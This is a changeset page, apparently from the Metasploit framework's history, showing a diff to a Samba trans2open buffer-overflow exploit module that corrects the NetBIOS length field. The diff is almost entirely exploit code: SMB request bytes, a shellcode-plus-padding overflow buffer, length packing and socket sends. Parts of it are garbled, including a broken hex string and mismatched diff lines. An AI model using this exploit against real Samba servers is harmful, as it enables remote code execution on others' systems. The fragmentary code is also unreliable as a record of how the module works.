Changeset 4062

Timestamp:

10/28/06 11:41:46 (2 years ago)

Author:

hdm

Message:

NetBIOS length field is properly calculated

Files:

• framework2/trunk/exploits/samba_trans2open.pm (modified) (3 diffs)

framework2/trunk/exploits/samba_trans2open.pm

@@ -191 +191 @@
-
-                my $Overflow =
-00\x04\x08\x20\x
+
-                  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
-                  "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
@@ -198 +198 @@
-                  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90";
-
+                
+
-                $Overflow .=  $shellcode;
-                $Overflow .= "A" x 297;
@@ -210 +212 @@
-                }
-
+                $Overflow = pack('CCn', 0, 0, length($Overflow)) . $Overflow;
+
-                $s->Send($Overflow);
-                $s->Send("\x00" x 810);